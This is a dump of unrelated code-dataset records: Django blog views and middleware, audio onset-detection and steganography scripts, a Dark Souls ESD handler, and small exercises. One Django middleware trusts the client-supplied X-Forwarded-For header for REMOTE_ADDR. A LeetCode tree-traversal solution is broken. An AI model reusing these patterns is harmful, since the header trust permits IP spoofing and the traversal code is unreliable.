[\n Vacancy(rotated_s_struc, rotated_s_struc[0]),\n Vacancy(rotated_s_struc, rotated_s_struc[1])]\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # trivially same defect (but rotated)\n rotated_identical_Cs_vacs[0]))\n self.assertTrue(sc_agnostic_pdc.are_equal(identical_Cs_vacs[0],\n rotated_identical_Cs_vacs[0]))\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice (and rotated)\n rotated_identical_Cs_vacs[1]))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice point (and rotated)\n rotated_identical_Cs_vacs[1]))\n\n # test a rotational + supercell + shift type structure transformation for non-symmorphic structure\n rotANDshift_ns_struc = ns_struc.copy()\n rotANDshift_ns_struc.translate_sites(range(len(ns_struc)),\n [0., 0.6, 0.3], frac_coords=True,\n to_unit_cell=True)\n rotANDshift_ns_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])\n ns_vac_Cs_set1 = Vacancy(ns_struc, ns_struc[0])\n rotANDshift_ns_vac_Cs_set1 = Vacancy(rotANDshift_ns_struc,\n rotANDshift_ns_struc[0])\n rotANDshift_ns_vac_Cs_set2 = Vacancy(rotANDshift_ns_struc,\n rotANDshift_ns_struc[1])\n\n self.assertTrue(sc_agnostic_pdc.are_equal(ns_vac_Cs_set1,\n # trivially same defect (but rotated and sublattice shifted)\n rotANDshift_ns_vac_Cs_set1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(ns_vac_Cs_set1,\n # same defect on different sublattice point (shifted and rotated)\n rotANDshift_ns_vac_Cs_set2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pymatgen/analysis/tests/test_structure_matcher.py","file_name":"test_structure_matcher.py","file_ext":"py","file_size_in_byte":51429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276187195","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom blog.models import Blog,BlogAuthor,Comment\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom blog.forms import NewCommentForm\n\n# Create your views here.\nclass CommentCreate(LoginRequiredMixin,CreateView):\n model = Comment\n fields = ['comment']\n\nclass BlogAuthorList(generic.ListView):\n model = BlogAuthor\n paginate_by = 5\n\nclass BlogList(generic.ListView):\n model = Blog\n paginate_by = 5\n\nclass BlogAuthorDetail(generic.DetailView):\n model = BlogAuthor\n\nclass BlogDetail(generic.DetailView):\n model = Blog\n\n@login_required\ndef newComment(request,pk):\n blog = get_object_or_404(Blog,pk=pk)\n\n # If this is a POST request then process the Form data\n if request.method == 'POST':\n\n # Create a form instance and populate it with data from the request (binding):\n form = NewCommentForm(request.POST)\n\n #Check if the form is valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required (here we just write it to the model due_back field)\n new_comment = Comment.objects.create(blog=blog,comment=form.cleaned_data['comment'],author=request.user)\n new_comment.save()\n\n # redirect to a new URL\n return HttpResponseRedirect(reverse('blog-detail',args=[str(pk)]))\n \n # If this is a GET (or any other method) create the default form.\n else:\n form = NewCommentForm()\n\n context = {\n 'form': form,\n 'blog': blog,\n }\n\n return render(request,'blog/comment_form.html',context=context)\n\ndef index(request):\n \"\"\"View function for the home site\"\"\"\n \n # The 'all()' is implied by default\n num_authors = BlogAuthor.objects.count()\n\n # Generate counts of some of the main objects\n num_blogs = Blog.objects.all().count()\n\n # The 'all()' is implied by default\n num_comments = Comment.objects.all().count()\n\n # Counter for Posts by Dr. Evil\n try:\n num_blogs_dr_evil = Blog.objects.filter(author__name__username__iexact='dr_evil').count()\n except:\n num_blogs_dr_evil = 0\n\n # Number of visits to this view, as counted in the session variable.\n num_visits = request.session.get('num_visits',0)\n request.session['num_visits']=num_visits+1\n\n context = {\n 'num_authors': num_authors,\n 'num_blogs': num_blogs,\n 'num_comments': num_comments,\n 'num_blogs_dr_evil': num_blogs_dr_evil,\n 'num_visits': num_visits,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459933662","text":"import HPC_Paths as p\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mir_eval\nimport librosa\nimport os\nimport sox\nfrom mir_eval import util\n\ndef onset(unit, start_time,fmin_input,h_length, feature_input):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n duration_length = end_time - start_time\n\n file = p.get_trimmed_audio(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \".wav\"\n\n y, sr = librosa.load(file, duration=duration_length)\n\n if feature_input == librosa.stft:\n S = feature_input(y, hop_length=h_length, n_fft=2*h_length)\n elif feature_input == librosa.feature.melspectrogram:\n S = feature_input(y, sr=sr, hop_length=h_length, fmin=fmin_input)\n S = librosa.logamplitude(S, ref=1.0)\n\n\n #onset_env = librosa.onset.onset_strength(S=S, aggregate = np.median)\n onset_env = librosa.onset.onset_strength(S=S)\n saveFile = p.get_detections(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections\"\n checkFile = p.get_data() + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections.npy\"\n np.save(saveFile, onset_env)\n\ndef peak_picking(unit, start_time, hop_duration): #medfilt_size=None):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n checkFile = p.get_filtered_detections(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections.npy\"\n li = np.load(checkFile)\n #if medfilt_size is not None:\n #pass # remove me\n # apply scipy.signal.medfilt\n peaks = []\n\n saveFile = p.get_peaks(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_peaks\"\n\n\n for i in range(len(li)):\n #first input \n if (i-1<0):\n if (li[i+1] < li[i]):\n #print(li[i],i)\n peaks.append((li[i],(i*hop_duration)))\n #last input\n if ((i+1)==len(li)):\n if (li[i-1] < li[i]):\n peaks.append((li[i],(i*hop_duration)))\n #print(li[i],i)\n #middle inputs\n if ((i-1>0) and ((i+1)!=len(li)) and (li[i-1] < li[i]) and (li[i+1] < li[i])):\n peaks.append((li[i],(i*hop_duration)))\n #print(li[i],i)\n\n np.save(saveFile, peaks)\n\ndef threshold(unit, start_time, thresh):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n checkFile = p.get_peaks(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_peaks.npy\"\n threshold_peaks = []\n predicted = []\n groundValues = []\n for i in np.load(checkFile):\n #print(i)\n if (i[0]>=thresh):\n threshold_peaks.append(i)\n predicted.append(i[1]) #+38340)\n\n truth = p.get_trimmed_annotation(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \".txt\"\n\n for line in open(truth,'r'):\n line = line.strip('\\n')\n line = float(line) #- 38340\n groundValues.append(line)\n\n groundValues = np.array(groundValues)\n predicted = np.array(predicted)\n\n\n\n #F, P, R = mir_eval.onset.f_measure(groundValues,predicted) #(reference_onsets, estimated_onsets)\n\n\n Tp = float(len(util.match_events(groundValues, predicted,0.05)))\n Fp = float(len(predicted)) - float(len(util.match_events(groundValues, predicted,0.05)))\n Fn = float(len(groundValues)) - float(len(util.match_events(groundValues, predicted,0.05)))\n\n\n return Tp, Fp, Fn #F, P, R\n","sub_path":"src/python_files/medianfilt_DetectionEvalSourceCode.py","file_name":"medianfilt_DetectionEvalSourceCode.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138882602","text":"from django.utils.deprecation import MiddlewareMixin\n\n#When gunicorn binds to unix socket, the request.META[\"REMOTE_ADDR\"] is empty.\n#When request.META[\"REMOTE_ADDR\"] is empty, djstripe cannot handle webhooks.\n#This middleware is needed to make sure request.META[\"REMOTE_ADDR\"] is not empty. \n\nclass XForwardedForMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n if \"HTTP_X_FORWARDED_FOR\" in request.META:\n request.META[\"HTTP_X_PROXY_REMOTE_ADDR\"] = request.META[\"REMOTE_ADDR\"]\n parts = request.META[\"HTTP_X_FORWARDED_FOR\"].split(\",\", 1)\n request.META[\"REMOTE_ADDR\"] = parts[0]\n\n\nimport time, logging\nfrom django.conf import settings\nfrom django.utils.cache import patch_vary_headers\n\n\"\"\"\nhttps://code.djangoproject.com/wiki/MultiHostMiddleware\n\nA simple middleware component that lets you use a single Django instance to serve multiple distinct hosts.\nIMPORTANT!! Make sure this is the FIRST entry in your MIDDLEWARE_CLASSES\n\"\"\"\nclass MultiHostMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n try:\n request.META[\"LoadingStart\"] = time.time()\n host = request.META[\"HTTP_HOST\"]\n #if host[-3:] == \":80\":\n # host = host[:-3] # ignore default port number, if present\n\n # best way to do this.\n host_port = host.split(':')\n if len(host_port)==2: \n host = host_port[0] \n \n if settings.HOST_MIDDLEWARE_URLCONF_MAP[host]:\n request.urlconf = settings.HOST_MIDDLEWARE_URLCONF_MAP[host]\n request.META[\"MultiHost\"] = str(request.urlconf)\n else:\n request.META[\"MultiHost\"] = str(settings.ROOT_URLCONF)\n\n except KeyError:\n pass # use default urlconf (settings.ROOT_URLCONF)\n\n def process_response(self, request, response):\n if 'MultiHost' in request.META:\n response['MultiHost'] = request.META.get(\"MultiHost\")\n\n if 'LoadingStart' in request.META:\n _loading_time = time.time() - int(request.META[\"LoadingStart\"])\n response['LoadingTime'] = \"%.2fs\" % ( _loading_time, )\n\n if getattr(request, \"urlconf\", None):\n patch_vary_headers(response, ('Host',))\n return response\n","sub_path":"propelproject/propelproject/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232168788","text":"# Assignment: Write a program which finds the largest element in the array \n\nwords = [\"apple\", \"banana\", \"orange\", \"apricot\", \"supercalifragilisticexpialidocious\"]\nnumbers = [1, 4, 23, 103, 567, 1432, 40523, 1000000]\n\ndef find_largest(array):\n length = 0\n item = \"\"\n\n for n in array:\n if len(str(n)) > length:\n length = len(str(n))\n item = n\n \n print(item)\n\n\nfind_largest(words)\nfind_largest(numbers)","sub_path":"Week1/Day4/Day4A2.py","file_name":"Day4A2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23552546","text":"# 107. Binary Tree Level Order Traversal II\n# Given a binary tree, return the bottom-up level order traversal of its \n# nodes' values. (ie, from left to right, level by level from leaf to root).\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# [\n# [15,7],\n# [9,20],\n# [3]\n# ]\n\nfrom collections import namedtuple\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def enQChildren(farther, qtreenode):\n \"\"\"\n :type farther: QTreeNodeItem\n :type qtreenode: deque \n \"\"\"\n if farther != None:\n depth = farther.depth\n if farther.left != None:\n qtreenode_item = QTreeNodeItem(farther.left, depth+1)\n qtreenode.append(qtreenode_item)\n\n if farther.right != None:\n qtreenode_item = QTreeNodeItem(farther.right, depth+1)\n qtreenode.append(qtreenode_item)\n\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n QTreeNodeItem = namedtuple('QTreeNodeItem', 'treenode depth')\n rslt = []\n\n if root != None:\n qtreenode = deque()\n qtreenode_item = QTreeNodeItem(root, 1)\n qtreenode.append(qtreenode_item)\n \n while not qtreenode:\n samedepth = []\n cur_depth = qtreenode[0].depth\n \n while not qtreenode and cur_depth == qtreenode[0].depth:\n front = qtreenode.popleft()\n treenode = front.treenode\n samedepth.append(treenode.val)\n enQChildren(front, qtreenode)\n\n rslt.append(samedepth)\n return rslt\n","sub_path":"src/107_e_btLevelOrderTraversal2.py","file_name":"107_e_btLevelOrderTraversal2.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598825152","text":"#!/usr/bin/env python\n# coding=utf-8\nimport random\nfrom operator import add, sub\ndef play(n):\n count = 0\n for i in range(10):\n a = random.randint(1,(n+1)*10 - 1)\n b = random.randint(1,(n+1)*10 - 1)\n p = [a, b]\n p.sort(reverse=True)\n a, b = p\n ops = {\"+\":add, \"-\":sub}\n d = random.choice([\"+\", \"-\"])\n c = raw_input(\"%d%s%d=\"%(a, d, b))\n if ops[d](a, b) == int(c):\n count += 1\n print (u\"√\")\n else:\n print (u\"×\")\n return count\nfor j in range(10):\n print (u\"第%d关游戏开始,游戏规则,%d内数字相加减\"%(j+1, (j+1)*10))\n ct = play(j)\n if ct >8:\n print (u\"第%d关通过\"%(j+1))\n continue\n else:\n print (u\"第%d关失败\"%(j+1))\n break\n","sub_path":"HelloWorld_python/venv/Include/day3_4.py","file_name":"day3_4.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310153691","text":"import logging\nimport pickle\nimport re\nfrom collections import OrderedDict\nfrom pathlib import Path\n\nfrom soulstruct.bnd import BND, BNDEntry, BaseBND\nfrom soulstruct.constants.darksouls1.maps import ALL_MAPS\nfrom soulstruct.esd.ds1ptde import ESD as ESD_PTDE\nfrom soulstruct.esd.ds1r import ESD as ESD_DSR\nfrom soulstruct.utilities import PACKAGE_PATH\n\n__all__ = [\"DarkSoulsTalk\", \"TalkESDBND\"]\n_LOGGER = logging.getLogger(__name__)\n\n_TALK_ESD_RE = re.compile(r\"t(\\d+)\\.esd$\")\n_TALK_ESP_RE = re.compile(r\"t(\\d+)\\.esp(\\.py)$\")\n\n\nclass TalkESDBND(object):\n \"\"\"Automatically loads all talk ESDs contained inside given path, or constructs BND from scratch using dictionary\n mapping talk IDs to valid ESD instance sources.\n\n By default, game version is automatically detected using BND paths.\n\n Currently only supported for DS1, hence its placement in this module.\n \"\"\"\n DSR_DCX_MAGIC = (36, 44)\n DS1_BND_PATH_FMT = \"N:\\\\FRPG\\\\data\\\\INTERROOT_{version}\\\\script\\\\talk\\\\t{talk_id}.esd\"\n\n bnd: BaseBND\n\n def __init__(self, talkesdbnd_source, game_version=None):\n if game_version not in (None, \"ptde\", \"dsr\"):\n raise ValueError(f\"`game_version` should be 'ptde', 'dsr', or None (to auto-detect), not {game_version}.\")\n if game_version:\n self.esd_class = ESD_DSR if game_version == \"dsr\" else ESD_PTDE\n\n self.talk = OrderedDict()\n self.game_version = game_version\n\n if isinstance(talkesdbnd_source, (str, Path)):\n if talkesdbnd_source.is_file():\n # Single `.talkesdbnd` files. Game version can be detected automatically in this case.\n self.bnd = BND(talkesdbnd_source) # path is remembered in BND\n self.bnd_name = Path(talkesdbnd_source).name\n self.unpack_from_bnd()\n elif talkesdbnd_source.is_dir():\n # Directory of individual ESP files/folders.\n self.bnd_name = \"\"\n if not self.game_version:\n raise ValueError(\"`game_version` must be specified ('ptde' or 'dsr') when loading TalkESDBND from \"\n \"ESP files/folders.\")\n self.bnd = self.get_empty_talkesdbnd()\n self.bnd_name = talkesdbnd_source.name\n self.bnd.dcx = self.DSR_DCX_MAGIC if self.game_version == \"dsr\" else ()\n self.reload_all_esp(talkesdbnd_source, allow_new=True)\n self.update_bnd()\n\n elif isinstance(talkesdbnd_source, dict):\n # Note that `bnd_name` cannot be detected and must be passed to `write()` manually.\n self.bnd_name = \"\"\n if not self.game_version:\n raise ValueError(\"`game_version` must be specified ('ptde' or 'dsr') when loading TalkESDBND from \"\n \"dictionary.\")\n self.bnd = self.get_empty_talkesdbnd()\n self.bnd.dcx = self.DSR_DCX_MAGIC if self.game_version == \"dsr\" else ()\n self.unpack_from_dict(talkesdbnd_source)\n\n def unpack_from_bnd(self):\n self.talk = OrderedDict()\n for entry in self.bnd:\n entry_path = Path(entry.path)\n if self.game_version is None:\n if \"INTERROOT_x64\" in entry.path:\n self.game_version = \"dsr\"\n elif \"INTERROOT_win32\" in entry.path:\n self.game_version = \"ptde\"\n else:\n raise ValueError(f\"Could not detect DS1 version from path: {entry.path}\")\n self.esd_class = ESD_DSR if self.game_version == \"dsr\" else ESD_PTDE\n talk_match = _TALK_ESD_RE.match(entry_path.name)\n if talk_match:\n talk_id = int(talk_match.group(1))\n try:\n self.talk[talk_id] = self.esd_class(entry.data, \"talk\")\n except Exception as e:\n _LOGGER.error(f\"Encountered error when trying to load talk ESD {talk_id}: {e}\")\n raise\n else:\n _LOGGER.warning(f\"Unexpected file in TalkESDBND: {entry_path.name}\")\n\n def unpack_from_dict(self, talk_dict):\n i = 1\n for talk_id, esd_source in talk_dict.items():\n if not isinstance(talk_id, int):\n raise ValueError(\"Keys of `talkesdbnd_source` dict must be integer talk IDs.\")\n try:\n esd = self.esd_class(esd_source)\n except Exception as e:\n _LOGGER.error(f\"Could not interpret ESD source with talk ID {talk_id}. Error: {str(e)}\")\n raise\n bnd_path = self.DS1_BND_PATH_FMT.format(\n version=\"x64\" if self.game_version == \"dsr\" else \"win32\", talk_id=talk_id)\n self.talk[talk_id] = esd\n self.bnd.add_entry(BNDEntry(data=esd.pack(), entry_id=i, path=bnd_path))\n i += 1\n\n def __getitem__(self, talk_id):\n return self.talk[talk_id]\n\n def __iter__(self):\n return iter(self.talk)\n\n def __repr__(self):\n return f\"TalkESDBND({repr(self.bnd_name)}): {list(self.talk)}\"\n\n def write_all_esp(self, directory):\n directory = Path(directory)\n directory.mkdir(parents=True, exist_ok=True)\n for talk_id, talk_esd in self.talk.items():\n talk_esd.write_esp(directory / f\"t{talk_id}.esp\")\n\n def reload_all_esp(self, directory, allow_new=True):\n directory = Path(directory)\n for esp_source in directory.glob(\"*.esp*\"):\n talk_match = _TALK_ESP_RE.match(esp_source.name)\n if talk_match:\n talk_id = int(talk_match.group(1))\n if not allow_new and talk_id not in self.talk:\n _LOGGER.warning(\n f\"# WARNING: `allow_new=False` and no talk ID found for ESP source: {esp_source.name}. \"\n f\"Ignoring it.\")\n continue\n try:\n self.talk[talk_id] = self.esd_class(esp_source)\n except Exception as e:\n _LOGGER.error(f\"Could not load talk ESD 't{talk_id}' from ESP source {esp_source.name}. Error: {e}\")\n raise\n\n def update_bnd(self):\n for talk_id, talk_entry in self.talk.items():\n bnd_path = self.DS1_BND_PATH_FMT.format(\n version=\"x64\" if self.game_version == \"dsr\" else \"win32\", talk_id=talk_id)\n if bnd_path in self.bnd.entries_by_path:\n self.bnd.entries_by_path[bnd_path].data = talk_entry.pack()\n else:\n new_id = max([entry.id for entry in self.bnd.entries]) + 1 if self.bnd.entries else 1\n new_entry = BNDEntry(data=talk_entry.pack(), entry_id=new_id, path=bnd_path)\n self.bnd.add_entry(new_entry)\n _LOGGER.debug(f\"New ESD entry added to TalkESDBND: t{talk_id}.esd\")\n\n def write(self, talkesdbnd_path=None):\n self.update_bnd()\n self.bnd.write(talkesdbnd_path)\n\n @classmethod\n def write_from_dict(cls, talk_dict, game_version, talkesdbnd_path):\n \"\"\"Shortcut to immediately load given dictionary and write to given path without pointless BND update.\"\"\"\n talkesdbnd = cls(talk_dict, game_version=game_version)\n talkesdbnd.bnd.write(talkesdbnd_path)\n\n @staticmethod\n def get_empty_talkesdbnd():\n \"\"\"Get empty pickled `.talkesdbnd` file for Dark Souls 1 (either version).\"\"\"\n with PACKAGE_PATH(\"project/resources/empty_talkesdbnd.ds1\").open(\"rb\") as f:\n return pickle.load(f)\n\n\nclass DarkSoulsTalk(object):\n \"\"\"Not actually used by SoulstructProject, but could still be useful for CLI editing.\"\"\"\n\n Depths: TalkESDBND\n UndeadBurg: TalkESDBND # and Undead Parish\n FirelinkShrine: TalkESDBND\n PaintedWorld: TalkESDBND\n DarkrootGarden: TalkESDBND # and Darkroot Basin\n Oolacile: TalkESDBND # and all DLC\n Catacombs: TalkESDBND\n TombOfTheGiants: TalkESDBND\n AshLake: TalkESDBND # and Great Hollow\n Blighttown: TalkESDBND\n LostIzalith: TalkESDBND # and Demon Ruins\n SensFortress: TalkESDBND\n AnorLondo: TalkESDBND\n NewLondoRuins: TalkESDBND # and Valley of Drakes\n DukesArchives: TalkESDBND\n KilnOfTheFirstFlame: TalkESDBND\n UndeadAsylum: TalkESDBND\n\n def __init__(self, talk_directory=None):\n \"\"\"Unpack Dark Souls talk ESD state machines into one single modifiable structure.\n\n Args:\n talk_directory: Directory where all the `.talkesbnd[.dcx]` files are stored. This will be inside\n 'script/talk' in your game directory (either version).\n \"\"\"\n self._directory = None\n self._data = {}\n\n if talk_directory is None:\n return\n self._directory = Path(talk_directory)\n if not self._directory.is_dir():\n raise ValueError(\"DarkSoulsTalk should be initialized with the directory containing TalkESDBND files.\")\n\n for game_map in ALL_MAPS:\n talkesdbnd_path = self._directory / (game_map.esd_file_stem + '.talkesdbnd')\n try:\n self._data[game_map.name] = TalkESDBND(talkesdbnd_path)\n setattr(self, game_map.name, self._data[game_map.name])\n except FileNotFoundError:\n raise FileNotFoundError(\n f\"Could not find TalkESDBND file {repr(game_map.esd_file_stem)} \"\n f\"({game_map.name}) in given directory.\")\n\n def __getitem__(self, talkesdbnd_name):\n return self._data[talkesdbnd_name]\n\n def __repr__(self):\n return f\"DarkSoulsTalk({repr(str(self._directory))})\"\n\n def save(self, talk_directory=None):\n if talk_directory is None:\n talk_directory = self._directory\n talk_directory = Path(talk_directory)\n for talkesdbnd in self._data.values():\n talkesdbnd_path = talk_directory / talkesdbnd.bnd.bnd_path.name\n talkesdbnd.write(talkesdbnd_path)\n _LOGGER.info(\"Dark Souls talk ESD files (TalkESDBND) written successfully.\")\n","sub_path":"soulstruct/esd/dark_souls_talk.py","file_name":"dark_souls_talk.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61958010","text":"import cv2\nimport numpy as np\nimport soundfile as sf\nfrom second_alg_random_poz import load_text_random\nfrom third_alg import make_new_image\nfrom hide_image_in_audio import extract_list\n\n\ndef load_text_in_audio(text, audio_image):\n dictionar_pozitii_text = load_text_random(audio_image, text)\n return audio_image, dictionar_pozitii_text\n\n\ndef get_chr(list_ord):\n message = \"\"\n for elem in list_ord:\n chr_elem = chr(elem)\n message = message + chr_elem\n return message\n\n\ndef extract_text(image, dictionary_poz):\n list_text = list()\n for key, value in dictionary_poz.items():\n r = image[value][0]\n g = image[value][1]\n b = image[value][2]\n list_text.append(r)\n list_text.append(g)\n list_text.append(b)\n text = get_chr(list_text)\n return text\n\n\ndef unload_text_from_audio(image, dictionary_poz):\n txt = extract_text(image, dictionary_poz)\n return txt\n\n\n# text1 = \"Ana are mere.Length of the text should be lower that 256 character.!\"\n# im2 = make_new_image(\"five.wav\")\n# img, pozitii_chr = load_text_in_audio(text1, im2)\n# lista_px = extract_list(img)\n# scaled = np.int16(lista_px/np.max(np.abs(lista_px)) * 32767)\n# sf.write('neext.wav', scaled, 44100)\n# print(unload_text_from_audio(img, pozitii_chr))\n","sub_path":"hide_text_in_audio.py","file_name":"hide_text_in_audio.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"108376776","text":"S = list(input())\nK = int(input())\nN = len(S)\nleft = 1\nwhile left < N and S[0] == S[left]:\n left += 1\nright = 0\nwhile N - 1 - right and S[0] == S[N - 1 - right]:\n right += 1\nS += S\ncnt = 0\nfor i in range(len(S) - 1):\n if S[i + 1] == S[i]:\n S[i + 1] = 'A'\n cnt += 1\nif left + right < N and left % 2 != 0 and right % 2 != 0:\n print(max(0, (cnt + 1) * (K // 2) + ((cnt + 1) // 2) * int(K % 2 != 0) - 1))\nelse:\n print(cnt * (K // 2) + (cnt // 2) * int(K % 2 != 0))\n","sub_path":"Python_codes/p02891/s332899749.py","file_name":"s332899749.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206171796","text":"\r\nimport config\r\nimport requests\r\n\r\n\r\ndef push_to_wechat(text, desp, appToken, uid):\r\n \"\"\"\r\n 通过wxpusher将消息推送到微信\r\n \"\"\"\r\n url = f'http://wxpusher.zjiecode.com/api/send/message'\r\n session = requests.Session()\r\n data = {\r\n \"appToken\": appToken,\r\n \"content\": desp,\r\n \"summary\": text,\r\n \"contentType\": 1,\r\n \"topicIds\": [],\r\n \"uids\": [\r\n uid\r\n ],\r\n }\r\n headers = {\r\n 'Content-Type': 'application/json'\r\n }\r\n resp = session.post(url, json=data, headers=headers)\r\n return resp.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n resp = push_to_wechat(text='test', desp='hi',\r\n appToken='',\r\n uid='')\r\n print(resp)\r\n","sub_path":"utils/serverchan_push.py","file_name":"serverchan_push.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134866300","text":"from collections import namedtuple\nfrom itertools import combinations, product\n\nplayer = {}\nboss = {}\nEquipment = namedtuple('Equipment', 'cost damage armor')\nweapons = {}\narmors = {'blank': Equipment(0, 0, 0)}\nrings = {'blank': Equipment(0, 0, 0)}\n\ndef player_wins(weapon, armor='blank', ring1='blank', ring2='blank'):\n damage = weapons[weapon].damage + rings[ring1].damage + rings[ring2].damage\n armor = armors[armor].armor + rings[ring1].armor + rings[ring2].armor\n dmg_give = max(damage - boss['Armor'], 1)\n dmg_take = max(boss['Damage'] - armor, 1)\n moves_for_player = (boss['Hit Points'] + dmg_give - 1) // dmg_give\n moves_for_boss = (player['Hit Points'] + dmg_take - 1) // dmg_take\n if moves_for_player <= moves_for_boss:\n return True\n else:\n return False\n\nwith open('Day 21 - input', 'r') as f:\n f.readline()\n for _, line in zip(range(3), f):\n line = line.strip().split(': ')\n player[line[0]] = int(line[-1])\n f.readline()\n f.readline()\n for _, line in zip(range(3), f):\n line = line.strip().split(': ')\n boss[line[0]] = int(line[-1])\n f.readline()\n f.readline()\n for _, line in zip(range(5), f):\n line = line.strip().split()\n weapons[line[0]] = (Equipment(cost=int(line[1]), damage=int(line[2]), armor=int(line[3])))\n f.readline()\n f.readline()\n for _, line in zip(range(5), f):\n line = line.strip().split()\n armors[line[0]] = (Equipment(cost=int(line[1]), damage=int(line[2]), armor=int(line[3])))\n f.readline()\n f.readline()\n for _, line in zip(range(6), f):\n line = line.strip().split()\n rings[line[0] + line[1]] = (Equipment(cost=int(line[2]), damage=int(line[3]), armor=int(line[4])))\n\n highest_cost = 9 + 13 + 25 + 20\n for weapon, armor in product(weapons.keys(), armors.keys()):\n for ring in rings.keys():\n cost = weapons[weapon].cost + armors[armor].cost + rings[ring].cost\n if not player_wins(weapon, armor, ring):\n highest_cost = max(highest_cost, cost)\n for ring1, ring2 in combinations(rings.keys(), 2):\n cost = weapons[weapon].cost + armors[armor].cost + rings[ring1].cost + rings[ring2].cost\n if not player_wins(weapon, armor, ring1, ring2):\n highest_cost = max(highest_cost, cost)\n print(highest_cost)\n","sub_path":"2015/Day 21-2.py","file_name":"Day 21-2.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"361435672","text":"from lxml import html\nimport requests\nimport json\n\n# page = requests.get('https://therun.sk/propozicie#segment-29')\npage = requests.get('https://therun.sk/data/track/segments')\ndata = page.json()\nprint(data)\n\nfolderName = './runProcessing/TheRun/res2019'\nwith open(folderName + '/data.json', 'w', encoding='UTF-8') as outfile:\n json.dump(data, outfile)\n\nprint('DONE')","sub_path":"runProcessing/TheRun/scrapRoute.py","file_name":"scrapRoute.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"500664650","text":"#typedef struct VoxelData {\n#\tint 